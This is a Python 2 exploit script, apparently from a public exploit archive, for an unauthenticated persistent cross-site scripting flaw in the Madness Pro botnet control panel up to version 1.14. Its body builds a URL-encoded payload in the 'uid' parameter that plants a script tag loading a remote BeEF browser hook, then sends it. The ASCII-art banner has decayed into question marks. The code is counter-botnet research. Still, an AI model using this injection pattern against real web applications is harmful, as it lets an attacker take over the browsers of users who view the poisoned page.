39 lines
No EOL
1.7 KiB
Python
Executable file
39 lines
No EOL
1.7 KiB
Python
Executable file
#!/usr/bin/env python2
|
|
# -*- coding: utf-8 -*-
|
|
# Exploit Title: Madness Pro <= 1.14 Persistent XSS
|
|
# Date: June 05, 2014
|
|
# Exploit Author: @botnet_hunter
|
|
# Version: 1.14
|
|
# Tested on: Apache2 - Ubuntu - MySQL
|
|
# ??? ????· ????? • ? ? ·. ?· ??
|
|
# ??• ? ?? ???? •?? ? ·?? ???????????
|
|
# ??? ???? ?????? ???? ??.? ???? ?? ?????·??????
|
|
# ????????.???????????.?? ???·???.???? ?????? ???·.
|
|
# .??? ?????·???? ????? ??? ??????? ????? ? •
|
|
# ??· ?• ????? ? ? ? ?? • • ? ? ·. ???· ·???? ? ? ??? ..?? · .?? ·
|
|
# ?? ????????? ?·?? •?????? ? ? ·?? ??????? ?? ??? ?? •??????.?·?? ?. ?? ?.
|
|
# ?? ??????????? ??·??????? ??? ?? ?????·????? ??· ?????????????????????????
|
|
# ????????????•???????????????? ?? ???????? ?????. ?? ??????????????????????
|
|
# ·??? ??? .? ?????? ??·???? ?? ????? ? ? ?????• ?? ?? ??? ???? ????
|
|
#
|
|
# Unauthenticated persistent XSS in Madness Pro panel <= 1.14
|
|
# Discovered and developed by bwall @botnet_hunter
|
|
#
|
|
# References:
|
|
# http://blog.cylance.com/a-study-in-bots-lobotomy
|
|
#
|
|
import urllib
|
|
|
|
# Fill in URL that Madness Pro bot connects back to
|
|
panel_url = ""
|
|
# Fill in URL to your Javascript payload (the shorter the better)
|
|
beef_hook = ""
|
|
|
|
|
|
def install_beef_hook(beef_hook_url, panel_index_url):
|
|
f = urllib.urlopen("{0}?uid=12345%3Cimg%20alt%3D\\')%3B%5C%22%3E%3Cscript%20src=\"{1}\">%3C%2Fscript%3E%3C%2Fa%3E"
|
|
"%3Ca%20href%3D%22%23%22%20onclick%3D%5C%22set_status(\\'12345".format(panel_index_url,
|
|
beef_hook_url))
|
|
print f.read()
|
|
|
|
install_beef_hook(beef_hook, panel_url) |